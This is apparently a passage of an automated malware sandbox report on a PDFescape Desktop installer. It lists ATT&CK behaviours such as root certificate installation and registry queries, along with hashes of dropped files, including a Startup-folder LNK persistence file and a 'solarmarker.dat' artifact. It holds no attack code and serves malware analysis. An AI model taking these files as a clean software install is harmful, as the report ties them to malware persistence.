        Install Root Certificate

        1
        T1130

        Credential Access

        Discovery

        Query Registry

        4
        T1012

        System Information Discovery

        4
        T1082

        Peripheral Device Discovery

        2
        T1120

        Lateral Movement

        Collection

        Exfiltration

        Command and Control

        Impact

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dll
          MD5

          a733c1f89219252497e94cbc66272478

          SHA1

          f5f9be9a2345f6dc0414c3b62b4087faa32ce351

          SHA256

          557bb1a545eac9c352dbbe15fbf383d29c6b2640b8cf74e49fefcdee97270547

          SHA512

          875b4958cadbd8901f4fcb6c5c12f24e2112dbd287975134c6f83573d6ce679be0058dc259ab1db31a64dc48470622c80e75555e43a240e63854df859b65e0bd

          Download Submit
        • C:\Program Files\PDFescape Desktop\atom.dll
          MD5

          9148f07e6dedce3e8e6a642fba0402d8

          SHA1

          2e403f6b65bf4519d0883ebb0025d77130105a1c

          SHA256

          35bd82d881759b2aa8ef6dc6e26d0943a19593b2192d207b4440c6e1a29ba05a

          SHA512

          8f7ab028af2b782df35bf9940a8f367ac49f015d8302242d553e9437882b1fb76ebc91f3dfe2faadd2cde07af260e8ad140e3a59f0f44c05188ebf2bcfe016cb

          Download Submit
        • C:\Program Files\PDFescape Desktop\brand.dll
          MD5

          594a3e3adcf139e7b20eddd1f16131d3

          SHA1

          7700c89b10e779fc6db72b42be0a81fe89378f9a

          SHA256

          52163973b0cf8d46bcd1fb26c58f8ab2f7b31fb7e2b05ded2b59ae8d4e2332ad

          SHA512

          d1240865fc5bfcd0c17205ce866be49b76ae31fccaaa724859822a6311e0e5bb6df2642b5659c1ad20414d79c6c9abbe74419ad4474fa71cbc4e8cab57d0c7cc

          Download Submit
        • C:\Program Files\PDFescape Desktop\context-menu.dll
          MD5

          2c9f26866787b200996d99ad160be2b2

          SHA1

          fec80f5b4a6acf29f74a2bc8918298518a487597

          SHA256

          4e3a2ed474ffdb02b4a177cd748cdb31b63f1f1fe3c32bf64cedfc06b6528a57

          SHA512

          9ade4951f2297ad233bbd41103c8a686a6098cdb2f88ad63eec8742e3bacb85fc02357a58163139259274ed6f3a1299d07b7b7db43bf8eb539c1e0fec018d6dd

          Download Submit
        • C:\Program Files\PDFescape Desktop\encoding-conversion.dll
          MD5

          448a6de619faf0f403c897b142f619c5

          SHA1

          e76953f8ee3c207b44d2e7c92eaabd5e6deee4d2

          SHA256

          00a91d382e5e4a04071b208e4717c0f53e7d7146db1ab542f3fb3358f8aa4c51

          SHA512

          f4e450e63a7105796fe78d90731c62804cf2ee5d2ac706525684b5c4eb20552126d1a2393acb5d5b4ee59ca4a4429aab9403510aa7947b2ef6f3eb36cbd3348d

          Download Submit
        • C:\Program Files\PDFescape Desktop\libcurl.dll
          MD5

          140cdda2f51d89dc194a8b8c3ab9e463

          SHA1

          255180975a70d00d31d516ecc895e42fd18c24bf

          SHA256

          a30c086bb16c702985df2193d1e52cfb15b978a679de014b449a95eb9a233c15

          SHA512

          5065efa34b3289be247a5bc3f677afae7a86753fc37f816da70d54d1986b6dfe8cc73ad13900020a99fec7de71bd4d23e02bf73fab6be220db1c65482ca860a4

          Download Submit
        • C:\Program Files\PDFescape Desktop\libssl-1_1-x64.dll
          MD5

          62dc606e7f85f8f15a582a045e394d19

          SHA1

          bad647ebb9207e2b20d464c6b420c84b971519d2

          SHA256

          7a91d83167c864b5381667370b95fe6081290c61356c90def9a25cf7b3d9c411

          SHA512

          d7e8c1e9abf695db2b1038c5231ccbc3c2cfd89171e4df3d7a13d8979c096772feace7dacbbb347a657e4e5519240813f8953b75c80259cd256245a9ef2f7e8f

          Download Submit
        • C:\Program Files\PDFescape Desktop\pdfcore.dll
          MD5

          c10d1adf13c2edde02e6adf49d1c900b

          SHA1

          4455fc9f229dedf4dd5622e6675c7a03ac8bd4d6

          SHA256

          6e028640b313e136a28c77245700a5b2a604935fc55f4454888192b685081d44

          SHA512

          0768d3372e652282d3cd0e5fa9e697949d682fa4e3c9ee8d70461588baa07243271129ec5b300c1893820fddaafda12867605c1c5858d57efa9e3fd65ca28fbe

          Download Submit
        • C:\Program Files\PDFescape Desktop\pdfgraphics.dll
          MD5

          1fc38631bf08eff07e8466f69ce90a46

          SHA1

          3973584e1371dfb26ae31cb4b555c972bd30f5a4

          SHA256

          78c09e4d384f1b3df9e9e00798f5f048b41866af5e0c16b7e463e6bdd695ec89

          SHA512

          5818d9f22cf865c12b08f684cb3cced4f55036f78df36d88cdb2530134f3db3170729b1212598ce6371c67ddd9eb887ff3e1fc551c258ee0ce3bd722529a63db

          Download Submit
        • C:\Program Files\PDFescape Desktop\pdfview.dll
          MD5

          40ca796430abed5d369f0781af26481e

          SHA1

          49abef703e2c9c70e691d8971505691402c2e745

          SHA256

          e303c331da06258aa0f726ae95dc51f65bb3de88e8fa431a7542e867e208ad19

          SHA512

          38a5be054afaddc28345860f23bb5824d8079b27d97862917a345460de7c131b8fbf41451248cc7efd60596cd5e0202160c9710992bac073b88b2b83074fa5b8

          Download Submit
        • C:\Program Files\PDFescape Desktop\preview-handler.dll
          MD5

          0a58eba4b339c0bb6f44a314ee06d7c7

          SHA1

          136b337a2c80fce2e4c0732fe5c821d58aad7d40

          SHA256

          32dbc446d09e062568989bace5cc19772e2dbeccec681dd8f38ef27cf5aab47a

          SHA512

          18d664f0242412a2e0acece5a7a8de5f1be6816b80b5665192bab2d2868e682ef43cd275d8be276ef909663bd11233c972c5f7856a32663f3876ca5a8475ad85

          Download Submit
        • C:\Program Files\PDFescape Desktop\root-service-provider.dll
          MD5

          58c639f842629bf97596add29b0ad19c

          SHA1

          059b152148a8fb92f9b8f119fa95608240ea2957

          SHA256

          40b0061cec34d9e7ce84b01a3d30e9d7eb2bcd71b9110b06680767ec7f9da503

          SHA512

          f304dd099df5e63ebea6f87a27b718bf7f1d7b995f77ea9cb0cbcbdc621d999eb5a1eca76b50a6e96a7e5e8d136e050fdcd04b9894743f254665537e35ad473a

          Download Submit
        • C:\Program Files\PDFescape Desktop\thumbnail-handler.dll
          MD5

          5c467cd8042003e71597dccb53a03bfb

          SHA1

          134db7349cfc485ee5f32b9583210843e02acdda

          SHA256

          2f6c64fe4b3c69d4f2235a461d74497e37c0eb3fb2432191370c2430848d5c85

          SHA512

          b1782bd052e98cfd026067992180764965fcfec3c9b840512d522f0ed2278920616ac292d6332b9be0b5829c33bcabc4409bc0fceafe17290b1b13cc3a67dd99

          Download Submit
        • C:\Program Files\PDFescape Desktop\ws.exe
          MD5

          c86fef0f4c86065fda9368fe5a1043d0

          SHA1

          9c858857549675608c933b980d2f74c0ffaaa769

          SHA256

          f88a861823f995c48ddb7afe8f4be90a5d1ea5deff3df0b0c152fa0e5c2f1b65

          SHA512

          4674d73eee0741a8faf992e55214a0471702031d6fc922ee8e141750f385169be773d2610f608ed513764359fe1c1f8ed9d2602ff34b346e88bcaf321015b812

          Download Submit
        • C:\Program Files\PDFescape Desktop\ws.exe
          MD5

          c86fef0f4c86065fda9368fe5a1043d0

          SHA1

          9c858857549675608c933b980d2f74c0ffaaa769

          SHA256

          f88a861823f995c48ddb7afe8f4be90a5d1ea5deff3df0b0c152fa0e5c2f1b65

          SHA512

          4674d73eee0741a8faf992e55214a0471702031d6fc922ee8e141750f385169be773d2610f608ed513764359fe1c1f8ed9d2602ff34b346e88bcaf321015b812

          Download Submit
        • C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe
          MD5

          87d28b3d2df1cab3711bf8d3b5b520c2

          SHA1

          1987a4bf2a37f6538c701461357a52b0bce1b980

          SHA256

          88472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977

          SHA512

          19226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4

          Download Submit
        • C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe
          MD5

          87d28b3d2df1cab3711bf8d3b5b520c2

          SHA1

          1987a4bf2a37f6538c701461357a52b0bce1b980

          SHA256

          88472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977

          SHA512

          19226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4

          Download Submit
        • C:\ProgramData\PDFescape Desktop\Installation\Statistics.dll
          MD5

          e5a591c125fdf21381cf543ed7706c66

          SHA1

          0baad9f119616ce5d0d39d4cdc9c884c1002a24e

          SHA256

          15b8775a3bae497325056103db0b14842fa8ae5592dcaacd9cce593099f5dee6

          SHA512

          20e3e0e45db7cff82b665ef28621a1a4071aadc97ec7167a7e47cf5dc7669c709932f3a3f1c7d2cd6b0a75dd7d0b42c4fac2ceabe5b074d7a338da1f9e061c35

          Download Submit
        • C:\ProgramData\PDFescape Desktop\Installation\pdfescape-desktop-startup-4.0.24.4617-x64.msi
          MD5

          692a85c10d2e69d290a14aef95aae86f

          SHA1

          381b06c12ac1fdcb1aaef79eb376b1f8d8f1c0e1

          SHA256

          65f598aef6b4ff4cdd5efe63ad7d91f5014c53c5afbfc20e215e7427cc84a84d

          SHA512

          38a67af0d1f593680e3da8e920ce9bf0e831168aebf4be2fc0fca34835d43e809103316b3cdaf71156aeea72139e0285eecefa6d391c4af2b9ea55745ec0d933

          Download Submit
        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5
          MD5

          0dd2832c3de67e2bd6bbc2061308c7f3

          SHA1

          e9486e3de283b08b094556f91e81bd17d7e25be2

          SHA256

          a55858addebe5c10572a0056b6fe4cee19ea392d41647d408d0d275bc5697f3a

          SHA512

          31c771ebfbc697f604397a46ceecea1226cfa7c3b17817458c770b95481bbbcc571f3b58a0adca75466e2ed466f9d91a14c40b3963a34b95fb1b9715aaf9074b

          Download Submit
        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\66AE3BFDF94A732B262342AD2154B86E_ACB5A342F7DC5D176FB6290AA1E0F299
          MD5

          ae95e79229dc82d4ab535d5b74fd6ce9

          SHA1

          96f9949f4878dd59781e9edfe58793cebc068c4b

          SHA256

          0d7ca357ae030152e06e327ffce34335b9bbb019f74a1e0637ca4f2ed4a36ed3

          SHA512

          b86c685eb27972c388ebadfb1c1926abe898226c5cfa353098911d0aad8979f234984ffe8e07abdfeb80def95466f4e76d2d6aab22ecdfca41e14b39e65f83fc

          Download Submit
        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\42B9A473B4DAF01285A36B4D3C7B1662_178C086B699FD6C56B804AF3EF759CB5
          MD5

          658932b90137ac6ca0e096769777e115

          SHA1

          72dc37134a70cefbf803351331bb68a422834c8e

          SHA256

          cb0c49a84874d0963ec43c19c0d3adddc0c3789fe01da00f3ff30c2341c5b8e9

          SHA512

          ae7bbc5e638b7e023e687ba13791f3cca9264794567667b8db484993978e6c800a70441a427573ae7cb91af081d2f1d8357729eed928f3a23882612fda9caabc

          Download Submit
        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\66AE3BFDF94A732B262342AD2154B86E_ACB5A342F7DC5D176FB6290AA1E0F299
          MD5

          bf4566680139f0ee845f1381368947cb

          SHA1

          cf283c4533070753dd71e31a91d21fa8543f157e

          SHA256

          4de8549a851c54ef0cdea39aaccd2ea87e40084815cec2d6fd871d664d20ca92

          SHA512

          3be487bdb5b58b65ed8587c462a80181774b6c3d9378f78c0a612c453c845d502fe86f7aa7477211923e2f62b889494e919bd38ea6577924eb11b460c19fda47

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          MD5

          c2d06c11dd1f1a8b1dedc1a311ca8cdc

          SHA1

          75c07243f9cb80a9c7aed2865f9c5192cc920e7e

          SHA256

          91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

          SHA512

          db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          MD5

          c2d06c11dd1f1a8b1dedc1a311ca8cdc

          SHA1

          75c07243f9cb80a9c7aed2865f9c5192cc920e7e

          SHA256

          91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

          SHA512

          db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          MD5

          c2d06c11dd1f1a8b1dedc1a311ca8cdc

          SHA1

          75c07243f9cb80a9c7aed2865f9c5192cc920e7e

          SHA256

          91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

          SHA512

          db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          MD5

          d41d8cd98f00b204e9800998ecf8427e

          SHA1

          da39a3ee5e6b4b0d3255bfef95601890afd80709

          SHA256

          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

          SHA512

          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          MD5

          c2d06c11dd1f1a8b1dedc1a311ca8cdc

          SHA1

          75c07243f9cb80a9c7aed2865f9c5192cc920e7e

          SHA256

          91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

          SHA512

          db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          MD5

          c2d06c11dd1f1a8b1dedc1a311ca8cdc

          SHA1

          75c07243f9cb80a9c7aed2865f9c5192cc920e7e

          SHA256

          91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

          SHA512

          db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          MD5

          c2d06c11dd1f1a8b1dedc1a311ca8cdc

          SHA1

          75c07243f9cb80a9c7aed2865f9c5192cc920e7e

          SHA256

          91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

          SHA512

          db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          MD5

          c2d06c11dd1f1a8b1dedc1a311ca8cdc

          SHA1

          75c07243f9cb80a9c7aed2865f9c5192cc920e7e

          SHA256

          91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

          SHA512

          db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

          Download Submit
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          MD5

          c2d06c11dd1f1a8b1dedc1a311ca8cdc

          SHA1

          75c07243f9cb80a9c7aed2865f9c5192cc920e7e

          SHA256

          91ac15f1f176f74f02ce89ecdc443d8e33e0064c7bc69a87c7b2da145449d586

          SHA512

          db00860292c3e7430b1534f459c2f0f9778df3a94c51d622dcf1cde390a5539bdc6d60a0d41e6f1ed99a989f17ecb109abd4c17faac4cd398945536f1d0ebb4d

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\is-6J7C8.tmp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp
          MD5

          0dc8e93706ff1b10cd6d60ab0ec15d88

          SHA1

          9e9c66127ba35ca4ee66fb3fa8820a683d4c943e

          SHA256

          3b79aab07b9461a9d4f3c579555ee024888abcda4f5cc23eac5236a56bf740c7

          SHA512

          0dbbd64f27055997279e36254ba2515b3672b41ef037777fd7490c0d0fa22f791934b483d281a33e542d9f5ee48bac73f2817e1dd93b0e3484c4c5653c8dbf66

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\is-TVUP7.tmp\PDFescape_Desktop_Installer.exe
          MD5

          87d28b3d2df1cab3711bf8d3b5b520c2

          SHA1

          1987a4bf2a37f6538c701461357a52b0bce1b980

          SHA256

          88472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977

          SHA512

          19226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4

          Download Submit
        • C:\Users\Admin\AppData\Local\Temp\is-TVUP7.tmp\PDFescape_Desktop_Installer.exe
          MD5

          87d28b3d2df1cab3711bf8d3b5b520c2

          SHA1

          1987a4bf2a37f6538c701461357a52b0bce1b980

          SHA256

          88472e266efd1a24182cf902e34e9d6b08a7b5e301be837343ffd34fe5560977

          SHA512

          19226f61925328a990f6a8d7416d1047f395fcb9f2bbd3bc5d7af4b1d0e40b54cecd501f92ba885976ec790c1b397f21814116b8a6d6073d01a58d8d6f1a9de4

          Download Submit
        • C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk
          MD5

          e1e3519302ca4dabf79abd88d7912e7a

          SHA1

          94efdff60edb157267eaa3acd3267568ab7ea769

          SHA256

          3fd4de0e749ccd33447957c9330d0fe9e349fe654b9933522a657bc95766c1ba

          SHA512

          03879c53e8ddd4e1c78624e7a0824ee190cff5b3f47162228b503d04268522a290e668d67f46578f46c4b6c56636f98ec185b065b0d527826516db7fe80289ea

          Download Submit
        • C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk
          MD5

          e1e3519302ca4dabf79abd88d7912e7a

          SHA1

          94efdff60edb157267eaa3acd3267568ab7ea769

          SHA256

          3fd4de0e749ccd33447957c9330d0fe9e349fe654b9933522a657bc95766c1ba

          SHA512

          03879c53e8ddd4e1c78624e7a0824ee190cff5b3f47162228b503d04268522a290e668d67f46578f46c4b6c56636f98ec185b065b0d527826516db7fe80289ea

          Download Submit
        • C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk
          MD5

          075847bbbcd951286905ee7185b4428b

          SHA1

          2a383a14fba21ba931e9d032e0ff81bb8c5e7a08

          SHA256

          0ce78bd25d8df577dad184e2be7a40b58eb2925080d3497b351629a978bd8916

          SHA512

          d57d99cc938737e1b4bcca70320af29d7ed961816155fac0ffe422f003153c7a67f7a7d9c9cf8aae122983b26f63358a3998607df148a4cc4581742a3d449bee

          Download Submit
        • C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk
          MD5

          075847bbbcd951286905ee7185b4428b

          SHA1

          2a383a14fba21ba931e9d032e0ff81bb8c5e7a08

          SHA256

          0ce78bd25d8df577dad184e2be7a40b58eb2925080d3497b351629a978bd8916

          SHA512

          d57d99cc938737e1b4bcca70320af29d7ed961816155fac0ffe422f003153c7a67f7a7d9c9cf8aae122983b26f63358a3998607df148a4cc4581742a3d449bee

          Download Submit
        • C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk
          MD5

          99b0c886e5700b6b843fa0d8979f0604

          SHA1

          d730661df7ec0eabec18b07c13433063f0e2048a

          SHA256

          9913fb9153d6ad9ef836ee0f48b1b17f1e535a22ab7774da6eb62220ed278d97

          SHA512

          4fecf15b5f03e482adbb574af9b31135304e594d7a4ffbd169c03051b7122416ba13c887309f30c2ca0896444c6579e8de9f4d7c6e27896541d0c85ba0893c84

          Download Submit
        • C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk
          MD5

          e26d9ece8d85162d7921e151f52dae07

          SHA1

          d75e501ffe9af536b6a9bf2fdd6c42e7c1261b7a

          SHA256

          57dafed76785661fbd2bebeb04ecdb1501997734f0b6a269f5a8e6d59b6006db

          SHA512

          4ad656e5f93f8ff6b486fde74b8203bcf7dfdfc2d9e84ac57ede16f4a7233269cdfb5a03ed35d4327e73f6cfa0d9e82185a5a106a536c225a90300d223943c1d

          Download Submit
        • C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk
          MD5

          0401ce3540201bd91bd08f80246d10c9

          SHA1

          51ef2ce98b354aabd11381a5b42ebcd8e6a30c8b

          SHA256

          a351329439cc6ac171e05ad07356fb87c00b4bfcc15aa735ac120055b714da74

          SHA512

          314276a70f351ecbd8e330a270624367ef702696c6673a285bb87cba9a972b0ed0a5f275cc842d4c9bde005ec05d2cdef48ad02a8033b87a33e6618e46c79169

          Download Submit
        • C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk
          MD5

          340d27b63fafc4049fff324e72668717

          SHA1

          95811f67c2bfbcf28ca24c36f68b2cfdeab1511d

          SHA256

          530a2467c97d94a1b5c053432f83ce74d64d30590f8188376e5304ba8cee2042

          SHA512

          0fdd5271a3814496dd6c72b1291b27baa51f825cd5687362477d1e4c7984daac744a6e628dee2ebb94125793b1e1e182255f75e92a037309cfb7efeff8275bf7

          Download Submit
        • C:\Users\Admin\AppData\Roaming\MIcroSOft\WiNdOws\stArT meNU\ProGRamS\startUP\a5f7f8402a94f0a5809d08c468cdb.LNk
          MD5

          2be12208707f97a3075dd24297a68444

          SHA1

          67b368397c4bc370db25d584b2ead03c15dca389

          SHA256

          6dc9f217d76c10c1d9c319a3a831b255ca68d088b96ae2d269a6806d99685d3d

          SHA512

          01d27d24173720e3c5d0bd0b7a6351abaf6a57a3f513912e9a906c92509a4df4effab613661e9254188c246a128197f561ae72bca373865eab7e1da27d61f24c

          Download Submit
        • C:\Users\Admin\appdata\roaming\solarmarker.dat
          MD5

          821bd77ad1baa30c3f824594b2896476

          SHA1

          1e59c4dc0b698f526649342257cddaf19e1585c7

          SHA256

          83d3d260ecfbf9aad34ce0f019937948269c6c7dcbfc39512a40bf4ee3a743f1

          SHA512

          e2a053ecd89cb986f2f52d11794b6e0d9e63e6756fb421fb21b38f4e3272cbf12c4a2a76b861ae5786235fa3716ddce1001c17a37326c8a690e8021211f1ec3e

          Download Submit
        • C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b
          MD5

          f49af433f9076c15cab2d858be35b939

          SHA1

          19fb76407184356e82560714f225a323ec19abc9

          SHA256

          c9a510a5ea2d8575aa2f33691de5bae9c6086a5ced125a8ca1d6cb41463a5154

          SHA512

          89163a3cd141906d559711a31a42e0153715eb54c9f5ec25395f34ab338270d98723e0e4bbad57a34440a49886194e58beb0048cd7c4cf9e432ffbaab52fe40c

          Download Submit
        • \Program Files (x86)\PDFescape Desktop\pdfactivedoc.dll
          MD5

          a733c1f89219252497e94cbc66272478

          SHA1

          f5f9be9a2345f6dc0414c3b62b4087faa32ce351

          SHA256

          557bb1a545eac9c352dbbe15fbf383d29c6b2640b8cf74e49fefcdee97270547

          SHA512

          875b4958cadbd8901f4fcb6c5c12f24e2112dbd287975134c6f83573d6ce679be0058dc259ab1db31a64dc48470622c80e75555e43a240e63854df859b65e0bd

          Download Submit
        • \Program Files\PDFescape Desktop\atom.dll
          MD5

          9148f07e6dedce3e8e6a642fba0402d8

          SHA1

          2e403f6b65bf4519d0883ebb0025d77130105a1c

          SHA256

          35bd82d881759b2aa8ef6dc6e26d0943a19593b2192d207b4440c6e1a29ba05a

          SHA512

          8f7ab028af2b782df35bf9940a8f367ac49f015d8302242d553e9437882b1fb76ebc91f3dfe2faadd2cde07af260e8ad140e3a59f0f44c05188ebf2bcfe016cb

          Download Submit
        • \Program Files\PDFescape Desktop\brand.dll
          MD5

          594a3e3adcf139e7b20eddd1f16131d3

          SHA1

          7700c89b10e779fc6db72b42be0a81fe89378f9a

          SHA256

          52163973b0cf8d46bcd1fb26c58f8ab2f7b31fb7e2b05ded2b59ae8d4e2332ad

          SHA512

          d1240865fc5bfcd0c17205ce866be49b76ae31fccaaa724859822a6311e0e5bb6df2642b5659c1ad20414d79c6c9abbe74419ad4474fa71cbc4e8cab57d0c7cc

          Download Submit
        • \Program Files\PDFescape Desktop\context-menu.dll
          MD5

          2c9f26866787b200996d99ad160be2b2

          SHA1

          fec80f5b4a6acf29f74a2bc8918298518a487597

          SHA256

          4e3a2ed474ffdb02b4a177cd748cdb31b63f1f1fe3c32bf64cedfc06b6528a57

          SHA512

          9ade4951f2297ad233bbd41103c8a686a6098cdb2f88ad63eec8742e3bacb85fc02357a58163139259274ed6f3a1299d07b7b7db43bf8eb539c1e0fec018d6dd

          Download Submit
        • \Program Files\PDFescape Desktop\encoding-conversion.dll
          MD5

          448a6de619faf0f403c897b142f619c5

          SHA1

          e76953f8ee3c207b44d2e7c92eaabd5e6deee4d2

          SHA256

          00a91d382e5e4a04071b208e4717c0f53e7d7146db1ab542f3fb3358f8aa4c51

          SHA512

          f4e450e63a7105796fe78d90731c62804cf2ee5d2ac706525684b5c4eb20552126d1a2393acb5d5b4ee59ca4a4429aab9403510aa7947b2ef6f3eb36cbd3348d

          Download Submit
        • \Program Files\PDFescape Desktop\libcurl.dll
          MD5

          140cdda2f51d89dc194a8b8c3ab9e463

          SHA1

          255180975a70d00d31d516ecc895e42fd18c24bf

          SHA256

          a30c086bb16c702985df2193d1e52cfb15b978a679de014b449a95eb9a233c15

          SHA512

          5065efa34b3289be247a5bc3f677afae7a86753fc37f816da70d54d1986b6dfe8cc73ad13900020a99fec7de71bd4d23e02bf73fab6be220db1c65482ca860a4

          Download Submit
        • \Program Files\PDFescape Desktop\libssl-1_1-x64.dll
          MD5

          62dc606e7f85f8f15a582a045e394d19

          SHA1

          bad647ebb9207e2b20d464c6b420c84b971519d2

          SHA256

          7a91d83167c864b5381667370b95fe6081290c61356c90def9a25cf7b3d9c411

          SHA512

          d7e8c1e9abf695db2b1038c5231ccbc3c2cfd89171e4df3d7a13d8979c096772feace7dacbbb347a657e4e5519240813f8953b75c80259cd256245a9ef2f7e8f

          Download Submit
        • \Program Files\PDFescape Desktop\pdfcore.dll
          MD5

          c10d1adf13c2edde02e6adf49d1c900b

          SHA1

          4455fc9f229dedf4dd5622e6675c7a03ac8bd4d6

          SHA256

          6e028640b313e136a28c77245700a5b2a604935fc55f4454888192b685081d44

          SHA512

          0768d3372e652282d3cd0e5fa9e697949d682fa4e3c9ee8d70461588baa07243271129ec5b300c1893820fddaafda12867605c1c5858d57efa9e3fd65ca28fbe

          Download Submit
        • \Program Files\PDFescape Desktop\pdfgraphics.dll
          MD5

          1fc38631bf08eff07e8466f69ce90a46

          SHA1

          3973584e1371dfb26ae31cb4b555c972bd30f5a4

          SHA256

          78c09e4d384f1b3df9e9e00798f5f048b41866af5e0c16b7e463e6bdd695ec89

          SHA512

          5818d9f22cf865c12b08f684cb3cced4f55036f78df36d88cdb2530134f3db3170729b1212598ce6371c67ddd9eb887ff3e1fc551c258ee0ce3bd722529a63db

          Download Submit
        • \Program Files\PDFescape Desktop\pdfview.dll
          MD5

          40ca796430abed5d369f0781af26481e

          SHA1

          49abef703e2c9c70e691d8971505691402c2e745

          SHA256

          e303c331da06258aa0f726ae95dc51f65bb3de88e8fa431a7542e867e208ad19

          SHA512

          38a5be054afaddc28345860f23bb5824d8079b27d97862917a345460de7c131b8fbf41451248cc7efd60596cd5e0202160c9710992bac073b88b2b83074fa5b8

          Download Submit
        • \Program Files\PDFescape Desktop\preview-handler.dll
          MD5

          0a58eba4b339c0bb6f44a314ee06d7c7

          SHA1

          136b337a2c80fce2e4c0732fe5c821d58aad7d40

          SHA256

          32dbc446d09e062568989bace5cc19772e2dbeccec681dd8f38ef27cf5aab47a

          SHA512

          18d664f0242412a2e0acece5a7a8de5f1be6816b80b5665192bab2d2868e682ef43cd275d8be276ef909663bd11233c972c5f7856a32663f3876ca5a8475ad85

          Download Submit
        • \Program Files\PDFescape Desktop\root-service-provider.dll
          MD5

